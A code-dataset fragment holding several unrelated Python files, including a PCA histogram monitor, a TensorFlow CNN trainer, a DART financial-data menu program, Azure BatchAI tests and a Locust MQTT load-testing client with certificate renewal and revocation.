self.__is_fit:\n raise Exception(\"Must fit the DQMPCA before calling transform\")\n\n def fit(self, hdata):\n if isinstance(hdata, HistCollection):\n self._hist_cleaner = hdata.hist_cleaner\n cleaned = hdata.hdata\n norms = hdata.norms\n \n else:\n self._hist_cleaner = HistCleaner()\n self._hist_cleaner.fit(hdata)\n cleaned = self._hist_cleaner.transform(hdata)\n norms = np.sum(cleaned, axis=1)\n\n cleaned = cleaned[norms>self.norm_cut, :]\n self.pca.fit(cleaned) \n self.__is_fit = True\n\n if self.sse_ncomps is not None:\n self.sse_cuts = {}\n for ncomp in self.sse_ncomps:\n self.sse_cuts[ncomp] = []\n sses = self.sse(cleaned, ncomp)\n for pct in np.arange(1,101):\n self.sse_cuts[ncomp].append(np.percentile(sses, pct))\n \n def transform(self, hdata):\n from modules.histCollection import HistCollection\n from modules.histCollection import HistCleaner\n \"\"\"Transform a set of histograms with the trained PCA\"\"\"\n self._check_fit()\n if isinstance(hdata, HistCollection):\n cleaned = hdata.hdata\n else:\n cleaned = self._hist_cleaner.transform(hdata) \n return self.pca.transform(cleaned)\n \n def inverse_transform(self, xf, n_components=3, restore_bad_bins=False):\n import numpy as np\n self._check_fit()\n xf = np.array(xf)\n trunc = np.zeros((xf.shape[0], self._hist_cleaner.n_good_bins))\n trunc[:,:n_components] = xf[:,:n_components]\n ixf = self.pca.inverse_transform(trunc)\n if not restore_bad_bins:\n return ixf\n else:\n return self._hist_cleaner.restore_bad_bins(ixf)\n\n def sse(self, hdata, n_components=3):\n if isinstance(hdata, HistCollection):\n cleaned = hdata.hdata\n else:\n cleaned = self._hist_cleaner.transform(hdata) \n xf = self.transform(cleaned)\n ixf = self.inverse_transform(xf, n_components=n_components)\n return np.sqrt(np.sum((ixf-cleaned)**2, axis=1))\n \n def score(self, hdata, n_components=3):\n if not hasattr(self, \"sse_cuts\") or n_components not in self.sse_cuts:\n raise Exception(\"must fit first with {0} in sse_ncomps\".format(n_components))\n sse = self.sse(hdata, n_components)\n return np.interp(sse, self.sse_cuts[n_components], np.arange(1,101))\n\n @property\n def explained_variance_ratio(self):\n if self.use_standard_scaler:\n return self.pca.named_steps[\"pca\"].explained_variance_ratio_\n else:\n return self.pca.explained_variance_ratio_\n\n @property\n def mean(self):\n if self.use_standard_scaler:\n return self.pca.named_steps[\"scaler\"].inverse_transform(self.pca.named_steps[\"pca\"].mean_)\n else:\n return self.pca.mean_\n","sub_path":"modules/dqmpca.py","file_name":"dqmpca.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"357283120","text":"import tensorflow as tf\r\nimport numpy as np\r\n\r\n########################### READ FILE #################################\r\n\r\nFILE_PATH = \"data5.txt\"\r\nDATA_SIZE = 30*3\r\nLABEL_NUM = 3\r\nbatch_size = 50\r\nCASE = 1500\r\n\r\n\r\ndataSet = np.loadtxt(FILE_PATH, delimiter=' ', dtype=np.float32)\r\nnp.random.shuffle(dataSet)\r\nx_data = dataSet[:, 0:90]\r\ny_data = dataSet[:, [-1]]\r\nprint(x_data)\r\nx_data_ = np.reshape(x_data, (-1, 3, 30))\r\n#print (x_data_)\r\ny_data = y_data.astype(int)\r\n#y_data_ = tf.one_hot(y_data, 3)\r\n#print(y_data_)\r\n\r\nkeep_prob = tf.placeholder(\"float\")\r\nkeep_prob_hidden = tf.placeholder(\"float\")\r\n\r\n###########################\r\n\r\ndef weight_variable(shape) :\r\n initial = tf.truncated_normal(shape, stddev=0.1)\r\n return tf.Variable(initial)\r\n\r\ndef bias_variable(shape) :\r\n initial = tf.constant(0.1, shape=shape)\r\n return tf.Variable(initial)\r\n\r\ndef conv2d(x, W) :\r\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\r\n\r\ndef max_pool_2x2(x) :\r\n return tf.nn.max_pool(x, ksize=[1, 2, 1, 1], strides=[1, 2, 1, 1], padding='SAME')\r\n\r\n\r\n#####################################################################################################\r\n\r\n\r\n######################### MODELING ############################\r\n####################### PlaceHolder #######################\r\n\r\nx = tf.placeholder(tf.float32, shape=[None, 3, 30])\r\ny_ = tf.placeholder(tf.float32, shape=[None, LABEL_NUM])\r\n\r\n###################### Variables ########################\r\n\r\nW = tf.Variable(tf.zeros([DATA_SIZE, LABEL_NUM]))\r\nb = tf.Variable(tf.zeros([LABEL_NUM]))\r\n\r\n################## initializer ##################\r\n\r\nsess = tf.Session()\r\n\r\n\r\n########################### First Layer ###############################\r\n\r\nW_conv1 = weight_variable([3, 3, 1, 32])\r\nb_conv1 = bias_variable([32])\r\nx_image = tf.reshape(x, [-1,3,30,1])\r\n\r\n\r\nh_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)\r\nh_pool1 = max_pool_2x2(h_conv1)\r\nprint(h_conv1)\r\nprint(h_pool1)\r\n\r\nh_drop1 = tf.nn.dropout(h_pool1, keep_prob)\r\n\r\n########################### Second Layer ###############################\r\n\r\nW_conv2 = weight_variable([3, 3, 32, 64])\r\nb_conv2 = bias_variable([64])\r\n\r\nh_conv2 = tf.nn.relu(conv2d(h_drop1, W_conv2) + b_conv2)\r\nh_pool2 = max_pool_2x2(h_conv2)\r\nprint(h_conv2)\r\nprint(h_pool2)\r\n\r\nh_drop2 = tf.nn.dropout(h_pool2, keep_prob)\r\n\r\n########################### Third Layer ###############################\r\n\r\nW_conv3 = weight_variable([3, 3, 64, 128])\r\nb_conv3 = bias_variable([128])\r\n\r\nh_conv3 = tf.nn.relu(conv2d(h_drop2, W_conv3) + b_conv3)\r\nh_pool3 = max_pool_2x2(h_conv3)\r\nprint(h_conv3)\r\nprint(h_pool3)\r\n\r\nh_drop3 = tf.nn.dropout(h_pool3, keep_prob)\r\n\r\n########################### Full Connected Layer ###############################\r\n\r\nW_fc1 = weight_variable([1*30*128, 256])\r\nb_fc1 = bias_variable([256])\r\n\r\nh_pool3_flat = tf.reshape(h_pool3, [-1, 1*30*128])\r\n\r\nh_fc1 = tf.nn.relu(tf.matmul(h_pool3_flat, W_fc1) + b_fc1)\r\nh_fc1_drop = tf.nn.dropout(h_fc1, keep_prob_hidden)\r\n\r\n####################### SOFTMAX #############################\r\n\r\nW_fc2 = weight_variable([256, LABEL_NUM])\r\nb_fc2 = bias_variable([LABEL_NUM])\r\ny_conv = tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)\r\n\r\n\r\n######################## TRAIN #############################\r\n\r\n\r\ncross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=y_conv, labels=y_))\r\ntrain_step = tf.train.AdamOptimizer(learning_rate=0.000001).minimize(cross_entropy)\r\ncorrect_prediction = tf.equal(tf.argmax(y_conv,1), tf.argmax(y_,1))\r\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\r\n\r\n#x_image = tf.convert_to_tensor(x_data_)\r\n#y_label = tf.convert_to_tensor(y_data)\r\nsaver = tf.train.Saver()\r\n\r\n\r\nwith tf.Session() as sess :\r\n sess.run(tf.global_variables_initializer())\r\n onehot_labels = tf.one_hot(y_data, LABEL_NUM)\r\n onehot_vals = sess.run(onehot_labels)\r\n for j in range(1000):\r\n avg_accuracy_val = 0\r\n batch_count = 0\r\n for i in range(0, CASE, batch_size) :\r\n batch_x = x_data_[i:i+batch_size, :]\r\n batch_y = onehot_vals[i:i+batch_size, -1]\r\n cost_, accuracy_val = sess.run([train_step, accuracy], feed_dict={x: batch_x, y_: batch_y, keep_prob: 0.8, keep_prob_hidden:0.5})\r\n avg_accuracy_val += accuracy_val\r\n batch_count += 1\r\n else :\r\n avg_accuracy_val /=batch_count\r\n if(j%100==0) :\r\n save_path = saver.save(sess,'./tensorflow_live.ckpt')\r\n print('Epoch {}. Cost {}. Avg accurach {}'.format(j, cost_, avg_accuracy_val))\r\n\r\nsess.close()\r\n\r\nprint(\"Model saved in file: \", save_path)\r\n\r\n\r\n\r\n\r\n\"\"\" sess.run(train_step, feed_dict={x: batch_x, y_: batch_y, keep_prob: 0.5})\r\n if i%10 == 0 :\r\n train_accuracy = accuracy.eval(session = sess, feed_dict={x:batch_x, y_: batch_y, keep_prob: 1.0})\r\n print (\"step %d, training accuracy %g\" % (i, train_accuracy) ,\r\n train_step.run(session = sess, feed_dict={x: batch_x, y_: batch_y, keep_prob: 0.5}))\r\n\"\"\"","sub_path":"Intent_train_model.py","file_name":"Intent_train_model.py","file_ext":"py","file_size_in_byte":5020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"520575954","text":"import dart_fss as dart\nimport urllib.request as ul\nimport pandas as pd\nfrom tabulate import tabulate\n\nimport sys\nsys.path.append(\"/workspace/Financial_Statement/src/chapter2\")\nsys.path.append(\"/workspace/Financial_Statement/src/common\")\n\nimport UrlGenerator\nimport UrlToInfo\nimport RequestFactors as rf\n\n# API 인증키의 입력 및 인증과, 기업 정보 로딩을 1회만 하기 위해 전역변수 api_key, corp_list를 미리 선언\napi_key = None\ncorp_list = None\ncorp_list_staus = 0\n\n# 프로그램 상태 0\ndef ProgramStart():\n print(\"\"\"\n기업정보 분석 프로그램 with dart를 시작합니다.\n \"\"\")\n user_reply = int(input(\"\"\"\n기능을 선택해주세요(정수 입력).\n1. 박 회계사의 재무제표 분석법(공시정보 로드하기-최초 1회만 로딩) 0. 프로그램 종료하기\n\"\"\"))\n\n if user_reply == 1:\n global api_key\n global corp_list\n global corp_list_staus\n \n if api_key == None:\n api_key = get_API()\n if corp_list_staus == 0:\n print(\"\\n\\nDART에서 기업 정보를 로딩 중입니다. 잠시만 기다려주십시오...\\n\")\n corp_list = update_corp_list(api_key) # API 인증키의 입력 및 인증과 기업 정보 로딩을 1회만 하기 위한 장치, pandans DataFrame 객체이다.\n corp_list_staus = 1\n ParkFS()\n elif user_reply == 0:\n End()\n else:\n End()\n\n\n# 유저입력 01\ndef get_API():\n import AllocateAPI\n api_key = AllocateAPI.api_key(api_key=input('DART 사이트에서 할당받은 API를 입력하세요.(최초 1회만 인증)')) #해당 API로 할당과 인증이 완료.\n return api_key\n\n\ndef update_corp_list(api_key):\n # 모든 상장된 기업 리스트 불러오기\n url = \"https://opendart.fss.or.kr/api/corpCode.xml?crtfc_key=\"+api_key\n corp_list = UrlToInfo.load_company_lists(url)\n return corp_list\n\n\ndef ParkFS():\n print(\"_\"*70+\"\"\"\n초기화면/박 회계사의 재무제표 분석법\n\"\"\")\n user_reply = int(input(\"\"\"\n2. 재무상태표로 기업의 재무 상태 파악하기\n3. 손익계산서로 경영 성과 엿보기\n4. 지배기업과 종속기업 그리고 재무제표\n5. 기업의 현금흐름 파악하기\n6. 주석사항에서 알짝 정보 얻기\n7. 재무제표 분석과 주요 재무비율\n0. 이전으로\n\"\"\"))\n\n if user_reply == 2:\n chapter2()\n elif user_reply == 0:\n ProgramStart()\n\n\n# 유저입력 012\ndef chapter2():\n import chapter2\n chapter2.start()\n\n\n# 유저입력 -1\ndef End():\n print(\"프로그램을 종료합니다.\")\n","sub_path":"src/ProgramMain.py","file_name":"ProgramMain.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"648465859","text":"from django.urls import include, path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.BoqList, name='BoqList'),\n path('findboq', views.findBoq, name='findBoq'),\n path('addboq', views.AddBoq, name='AddBoq'),\n path('findboqdetail', views.findBoqDetail, name='findBoqDetail'),\n path('boqdetail/', views.boqdetailList, name='boqdetailList'),\n path('addboqdetail/', views.addboqdetail, name='addboqdetail'),\n]\n","sub_path":"construction/BOQ/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"32950924","text":"# coding: utf-8\n# -------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n# --------------------------------------------------------------------------\n# pylint: disable=line-too-long\nimport pytest\nfrom azure.mgmt.batchai import BatchAIManagementClient, models\nfrom devtools_testutils import AzureMgmtTestCase, ResourceGroupPreparer\nfrom msrestazure.azure_exceptions import CloudError\n\nfrom helpers import Helpers\n\n\nclass ExperimentTestCase(AzureMgmtTestCase):\n def setUp(self):\n super(ExperimentTestCase, self).setUp()\n self.client = Helpers.create_batchai_client(self) # type: BatchAIManagementClient\n\n @ResourceGroupPreparer(location=Helpers.LOCATION)\n def test_creation_and_deletion(self, resource_group, location):\n name = 'testee'\n workspace_name = 'workspace'\n self.client.workspaces.create(resource_group.name, workspace_name, location).result()\n experiment = self.client.experiments.create(resource_group.name, workspace_name, name).result()\n self.assertEqual(experiment.name, name)\n experiment_id = experiment.id\n # Check can get experiment info\n experiment = self.client.experiments.get(resource_group.name, workspace_name, name)\n self.assertEqual(experiment.id, experiment_id)\n # Check experiment found in list results\n experiments = self.client.experiments.list_by_workspace(resource_group.name, workspace_name)\n self.assertTrue(experiment_id in [e.id for e in experiments])\n # Delete\n self.client.experiments.delete(resource_group.name, workspace_name, name).result()\n # Check the experiment is actually deleted\n self.assertRaises(CloudError, lambda: self.client.experiments.get(resource_group.name, workspace_name, name))\n\n @ResourceGroupPreparer(location=Helpers.LOCATION)\n def test_experiments_isolation(self, resource_group, location):\n self.client.workspaces.create(resource_group.name, 'first', location).result()\n self.client.workspaces.create(resource_group.name, 'second', location).result()\n # Create a cluster, two experiments and a job in each experiment\n for workspace in ['first', 'second']:\n cluster = self.client.clusters.create(\n resource_group.name,\n workspace,\n 'cluster',\n parameters=models.ClusterCreateParameters(\n vm_size='STANDARD_D1',\n scale_settings=models.ScaleSettings(\n manual=models.ManualScaleSettings(target_node_count=0)),\n user_account_settings=models.UserAccountSettings(\n admin_user_name=Helpers.ADMIN_USER_NAME,\n admin_user_password=Helpers.ADMIN_USER_PASSWORD\n ),\n vm_priority='lowpriority'\n )).result()\n for experiment in ['exp1', 'exp2']:\n self.client.experiments.create(resource_group.name, workspace, experiment).result()\n self.client.jobs.create(\n resource_group.name,\n workspace,\n experiment,\n 'job',\n parameters=models.JobCreateParameters(\n cluster=models.ResourceId(id=cluster.id),\n node_count=1,\n std_out_err_path_prefix='$AZ_BATCHAI_MOUNT_ROOT',\n custom_toolkit_settings=models.CustomToolkitSettings(\n command_line='true'\n )\n )\n ).result()\n # Delete exp1 in the first workspace\n self.client.experiments.delete(resource_group.name, 'first', 'exp1').result()\n # Ensure the experiment was actually deleted\n self.assertRaises(CloudError, lambda: self.client.experiments.get(resource_group.name, 'first', 'exp1'))\n for workspace in ['first', 'second']:\n # Ensure the clusters are not affected\n self.client.clusters.get(resource_group.name, workspace, 'cluster')\n # Ensure the other experiments are not affected\n for experiment in ['exp1', 'exp2']:\n if workspace == 'first' and experiment == 'exp1':\n continue\n self.client.experiments.get(resource_group.name, workspace, experiment)\n job = self.client.jobs.get(resource_group.name, workspace, experiment, 'job')\n # And check the job are not terminated\n self.assertEqual(job.execution_state, models.ExecutionState.queued)\n","sub_path":"azure-mgmt-batchai/tests/test_mgmt_batchai_experiments.py","file_name":"test_mgmt_batchai_experiments.py","file_ext":"py","file_size_in_byte":4806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"608843623","text":"import sys\nfrom Bio import Phylo\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nsys.path.insert(0, \"ancient_erv_analysis\")\nfrom compute_q_traits import calculate_gc_content\nfrom gp_models import NeutralModel\n\n\ndef plot_nll(segment):\n erv_data = pd.read_csv(f\"../ancient_erv_analysis/data/3_q_traits/2_simulated_sequences/{segment}/traits.csv\",\n index_col=0).T\n erv_tree = Phylo.read(f\"../ancient_erv_analysis/metadata/segment_trees/paml_inferred/{segment}.nwk\", \"newick\")\n\n with open(f\"../ancient_erv_analysis/data/2_simulated_sequences/{segment}/alignment.root\", \"r\") as algn_f:\n root_seq = str(algn_f.read()).strip()\n\n true_z0 = calculate_gc_content(root_seq)\n\n nm = NeutralModel(erv_data['gc_content'], erv_tree,\n fixed_params={'u': 1.34, 'Zeq': 0.44, 'sigma_eq': 0.2464 / len(root_seq)})\n nm.fit()\n\n z0 = np.linspace(0., 1., 100)\n L = 800\n\n psi = (1. / L) * (0.44 + z0 - 2. * z0 * 0.44)\n\n nll = []\n\n for i in range(100):\n nm.z0 = z0[i]\n nm.psi = psi[i]\n nll.append(nm.nll())\n\n plt.plot(z0, nll)\n plt.axvline(true_z0, c='red', ls='--', label='True Z0')\n plt.xlabel(\"Z0\")\n plt.ylabel(\"NLL\")\n plt.title(f\"GC Content - {segment}\")\n plt.legend()\n plt.show()\n\n\nplot_nll('segment_320_722')\n","sub_path":"gp_models/plot_nll.py","file_name":"plot_nll.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"571356884","text":"\"\"\"\nPATTERN RULES\n{\n 'SUB': '#',\n 'TAGS': {TAGNAME': 'TOPIC'|INDEX for TOPIC.split(\"/\")|any fixed value except integer or 'TOPIC', ...},\n 'MEASUREMENT': INDEX for TOPIC.split(\"/\")|any fixed value,\n 'TYPE': bool|int|float|str|any fixed value\n}\n\"\"\"\n\nPATTERNS = [\n {'SUB': 'foobar/oben/lounge/leinwand/action',\n 'TAGS': {'TOPIC': 'TOPIC', 'ROOM': -3},\n 'MEASUREMENT': \"leinwand\", 'TYPE': str\n },\n {'SUB': 'foobar/+/tuer',\n 'TAGS': {'location': -2},\n 'MEASUREMENT': \"door_status\", 'TYPE': int\n },\n {'SUB': '/hq/og/baellebad/sensoren/temperatur',\n 'TAGS': {'location': -3},\n 'MEASUREMENT': \"temperature\", 'TYPE': float\n },\n {'SUB': '$SYS/#',\n 'TAGS': {'TOPIC': 'TOPIC', 'format': -1},\n 'MEASUREMENT': \"mqtt_statistic\", 'TYPE': float\n }\n]\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"55551263","text":"\"\"\"\n Handles Paho MQTT-Client operations like publish/subscription, connection,\n loop function.\n\"\"\"\nimport logging\nimport time\nimport json\nimport paho.mqtt.client as mqtt\n\nfrom src.utils import Utils\nfrom src.config import CONFIG\nfrom src.ejbca.cert_client import CertClient\n\n\nREQUEST_TYPE = 'mqtt'\nMESSAGE_TYPE_CONNECT = 'connect'\nMESSAGE_TYPE_DISCONNECT = 'disconnect'\nMESSAGE_TYPE_PUB = 'publish'\nMESSAGE_TYPE_SUB = 'subscribe'\nMESSAGE_TYPE_RECV_MESSAGE = 'recv_message'\nMESSAGE_TYPE_RENEW = 'renew'\nMESSAGE_TYPE_REVOKE = 'revoke'\n\n\nclass LocustError(Exception):\n \"\"\"\n Locust error exception.\n \"\"\"\n\nclass ConnectError(Exception):\n \"\"\"\n Connection error exception.\n \"\"\"\n\nclass DisconnectError(Exception):\n \"\"\"\n Disconnection error exception.\n \"\"\"\n\nclass CertRevogationError(Exception):\n \"\"\"\n Certificate revogation error exception.\n \"\"\"\n\n\nclass MQTTClient:\n \"\"\"\n MQTT client to load test Dojot MQTT IoTAgent.\n \"\"\"\n def __init__(self,\n device_id: str,\n run_id: str,\n should_revoke: bool,\n should_renew: bool):\n \"\"\"\n MQTT client constructor. To get this to work, you should call setup() after instantiating\n the class.\n\n Args:\n device_id: device identifier\n run_id: client run identifier\n should_revoke: whether this client should have its certificate revoked\n should_renew: whether this client should have its certificate renewed\n \"\"\"\n Utils.validate_tenant(CONFIG[\"app\"][\"tenant\"])\n Utils.validate_device_id(device_id)\n\n if len(run_id) < 1:\n raise ValueError(\"the run ID must have at least one character\")\n\n if should_renew and should_revoke:\n raise ValueError(\"only one of should_renew and should_revoke can be True\")\n\n self.device_id = device_id\n self.run_id = run_id\n self.should_revoke = should_revoke\n self.should_renew = should_renew\n\n self.is_connected = False\n self.mqttc = None\n\n self.tenant = CONFIG[\"app\"][\"tenant\"]\n self.username = \"\"\n self.topic = \"\"\n self.sub_topic = \"\"\n\n self.device_cert_dir = \"\"\n self.new_cert = None\n\n self.pubmmap = {}\n self.submmap = {}\n\n # Used to count the time between connection and revocation/renovation\n self.start_time = 0\n\n def setup(self) -> None:\n \"\"\"\n Initializes the required parameters.\n \"\"\"\n logging.basicConfig(**CONFIG[\"app\"][\"log_config\"])\n\n self.username = '{0}:{1}'.format(self.tenant, self.device_id)\n self.topic = \"{0}/attrs\".format(self.username)\n self.sub_topic = \"{0}/config\".format(self.username)\n\n self.device_cert_dir = CONFIG[\"security\"][\"cert_dir\"]\n\n # Creating a new certificate if the client was chosen to be revoked\n if self.should_revoke:\n self.device_cert_dir = self.device_cert_dir + CONFIG[\"security\"][\"revoke_cert_dir\"]\n self.new_cert = CertClient.new_cert(self.tenant, self.device_id)\n CertClient.create_cert_files(self.new_cert, self.device_cert_dir)\n\n elif self.should_renew:\n self.device_cert_dir = self.device_cert_dir + CONFIG[\"security\"][\"renew_cert_dir\"]\n self.new_cert = CertClient.new_cert(self.tenant, self.device_id)\n CertClient.create_cert_files(self.new_cert, self.device_cert_dir)\n\n self.configure_mqtt()\n\n def configure_mqtt(self) -> None:\n \"\"\"\n Configures the MQTT connection.\n \"\"\"\n # Certification files\n cert_dir = CONFIG[\"security\"][\"cert_dir\"]\n ca_cert_file = cert_dir + CONFIG[\"security\"][\"ca_cert_file\"]\n cert_file = self.device_cert_dir + CertClient.get_certificate_file(self.device_id)\n key_file = self.device_cert_dir + CertClient.get_private_key_file(self.device_id)\n\n # Configuring MQTT client\n self.mqttc = mqtt.Client(client_id=self.device_id)\n\n # Sets exponential reconnect delay\n self.mqttc.reconnect_delay_set(\n min_delay=CONFIG[\"security\"][\"min_time_reconn\"],\n max_delay=CONFIG[\"security\"][\"max_time_reconn\"]\n )\n\n # Setting up TLS\n self.mqttc.tls_set(ca_cert_file, cert_file, key_file)\n # TODO: investigate the problem when the insecure TLS mode is False\n # This problem seems to happen because the TLS implementation does not\n # expects an IP, but a hostname\n self.mqttc.tls_insecure_set(True)\n\n # Registering MQTT client callbacks\n self.mqttc.on_connect = self.locust_on_connect\n self.mqttc.on_disconnect = self.locust_on_disconnect\n self.mqttc.on_publish = self.locust_on_publish\n self.mqttc.on_subscribe = self.locust_on_subscribe\n self.mqttc.on_message = self.locust_on_message\n\n\n def connect(self) -> None:\n \"\"\"\n Connects to MQTT host.\n \"\"\"\n\n try:\n self.mqttc.connect_async(host=CONFIG['mqtt']['host'], port=CONFIG['mqtt']['port'],\n keepalive=CONFIG['mqtt']['con_timeout'])\n self.mqttc.loop_start()\n self.start_time = time.time()\n except Exception as exception:\n logging.error(\"Error while connecting to the broker: %s\", str(exception))\n Utils.fire_locust_failure(\n request_type=REQUEST_TYPE,\n name='connect',\n response_time=0,\n response_length=0,\n exception=ConnectError(\"disconnected\")\n )\n\n def publishing(self) -> None:\n \"\"\"\n Handles the publishing of messages to MQTT host.\n \"\"\"\n\n payload = {\"timestamp\": time.time()}\n start_time = time.time()\n\n try:\n err, mid = self.mqttc.publish(\n topic=self.topic,\n payload=json.dumps(payload),\n qos=CONFIG['mqtt']['qos']\n )\n\n if err:\n raise ValueError(err)\n\n self.pubmmap[mid] = {\n 'name': MESSAGE_TYPE_PUB,\n 'qos': CONFIG['mqtt']['qos'],\n 'topic': self.topic,\n 'payload': payload,\n 'start_time': start_time,\n 'messages': 'messages'\n }\n\n except Exception as exception:\n error = Utils.error_message(int(str(exception)))\n\n Utils.fire_locust_failure(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_PUB,\n response_time=Utils.time_delta(start_time, time.time()),\n exception=error\n )\n\n def subscribing(self) -> None:\n \"\"\"\n Handles the subscription in MQTT topics.\n \"\"\"\n\n start_time = time.time()\n\n try:\n err, mid = self.mqttc.subscribe((self.sub_topic, CONFIG['mqtt']['qos']))\n\n if err:\n raise ValueError(err)\n\n self.submmap[mid] = {\n 'name': MESSAGE_TYPE_SUB,\n 'qos': CONFIG['mqtt']['qos'],\n 'topic': self.sub_topic,\n 'payload': \"\",\n 'start_time': start_time,\n 'messages': 'messages'\n }\n\n except Exception as exception:\n error = Utils.error_message(int(str(exception)))\n logging.error(\"Error while subscribing: %s\", error)\n\n Utils.fire_locust_failure(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_SUB,\n response_time=Utils.time_delta(start_time, time.time()),\n exception=error\n )\n\n\n ###############\n ## Callbacks ##\n ###############\n\n def locust_on_subscribe(\n self,\n _client: mqtt.Client,\n _userdata,\n mid,\n _granted_qos) -> None:\n \"\"\"\n Subscription callback function.\n \"\"\"\n end_time = time.time()\n message = self.submmap.pop(mid, None)\n\n\n if message is None:\n Utils.fire_locust_failure(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_SUB,\n response_time=0,\n exception=ValueError(\"Subscription not found\"),\n )\n\n else:\n Utils.fire_locust_success(\n request_type=REQUEST_TYPE,\n name=message['name'],\n response_time=Utils.time_delta(message['start_time'], end_time),\n response_length=0\n )\n\n def locust_on_publish(self, _client: mqtt.Client, _userdata, mid) -> None:\n \"\"\"\n Publishing callback function.\n \"\"\"\n end_time = time.time()\n message = self.pubmmap.pop(mid, None)\n\n if message is None:\n Utils.fire_locust_failure(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_PUB,\n response_time=0,\n exception=ValueError(\"Published message could not be found\"),\n )\n\n else:\n Utils.fire_locust_success(\n request_type=REQUEST_TYPE,\n name=message['name'],\n response_time=Utils.time_delta(message['start_time'], end_time),\n response_length=len(message['payload']),\n )\n\n def locust_on_connect(\n self,\n _client: mqtt.Client,\n _flags_dict,\n _userdata,\n result_code: int) -> None:\n \"\"\"\n Connection callback function.\n \"\"\"\n if result_code == mqtt.MQTT_ERR_SUCCESS:\n self.subscribing()\n self.is_connected = True\n Utils.fire_locust_success(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_CONNECT,\n response_time=0,\n response_length=0\n )\n else:\n error = Utils.error_message(result_code)\n Utils.fire_locust_failure(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_CONNECT,\n response_time=0,\n exception=DisconnectError(error)\n )\n\n def locust_on_disconnect(self, _client: mqtt.Client, _userdata, result_code: int) -> None:\n \"\"\"\n Disconnection callback function.\n \"\"\"\n if result_code != mqtt.MQTT_ERR_SUCCESS:\n self.is_connected = False\n Utils.fire_locust_failure(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_DISCONNECT,\n response_time=0,\n exception=DisconnectError(Utils.error_message(result_code))\n )\n\n self.mqttc.reconnect()\n\n @staticmethod\n def locust_on_message(_client: mqtt.Client, _userdata, message: mqtt.MQTTMessage):\n \"\"\"\n Message reception callback function.\n \"\"\"\n if message is not None:\n publish_time = 0.0\n try:\n publish_time = float(json.loads(message.payload.decode())[\"timestamp\"])\n except Exception as exception:\n logging.error(\"Error while parsing the message payload: %s\", str(exception))\n raise Exception(str(exception))\n else:\n Utils.fire_locust_success(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_RECV_MESSAGE,\n response_time=Utils.time_delta(publish_time, time.time()),\n response_length=len(message.payload)\n )\n\n\n #################\n ## Certificate ##\n #################\n def renew_cert(self) -> None:\n \"\"\"\n Renew a certificate and emit an event whether it succeeded or not.\n \"\"\"\n if self.should_renew_now():\n try:\n self.new_cert.renew_cert()\n\n except Exception as exception:\n Utils.fire_locust_failure(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_RENEW,\n response_time=0,\n response_length=0,\n exception=exception\n )\n raise Exception(str(exception))\n\n else:\n Utils.fire_locust_success(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_RENEW,\n response_time=0,\n response_length=0\n )\n self.should_renew = False\n\n def revoke_cert(self) -> None:\n \"\"\"\n Revoke a certificate and emit an event whether it succeeded or not.\n \"\"\"\n if self.should_revoke_now():\n try:\n CertClient.revoke_cert(self.new_cert)\n\n except Exception as exception:\n Utils.fire_locust_failure(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_REVOKE,\n response_time=0,\n response_length=0,\n exception=exception\n )\n raise Exception(str(exception))\n\n else:\n if CertClient.has_been_revoked(self.new_cert):\n Utils.fire_locust_success(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_REVOKE,\n response_time=0,\n response_length=0\n )\n self.should_revoke = False\n else:\n Utils.fire_locust_failure(\n request_type=REQUEST_TYPE,\n name=MESSAGE_TYPE_REVOKE,\n response_time=0,\n response_length=0,\n exception=CertRevogationError(\"failed to revoke\")\n )\n\n def should_renew_now(self) -> bool:\n \"\"\"\n Verifies if the conditions to renew the certificate were satisfied.\n \"\"\"\n return self.should_renew and \\\n Utils.time_delta(self.start_time, time.time()) >= CONFIG[\"security\"][\"time_to_renew\"]\n\n def should_revoke_now(self) -> bool:\n \"\"\"\n Verifies if the conditions to revoke the certificate were satisfied.\n \"\"\"\n return self.should_revoke and \\\n Utils.time_delta(self.start_time, time.time()) >= CONFIG[\"security\"][\"time_to_revoke\"]\n","sub_path":"locust/src/mqtt_locust/mqtt_client.py","file_name":"mqtt_client.py","file_ext":"py","file_size_in_byte":14434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"372349413","text":"\"\"\"\r\nproblem 134. Gas Station\r\nhttps://leetcode.com/problems/gas-station/\r\n\r\nsolution:\r\n\r\n\"\"\" \r\n\r\nclass Solution(object):\r\n def canCompleteCircuit(self, gas, cost):\r\n 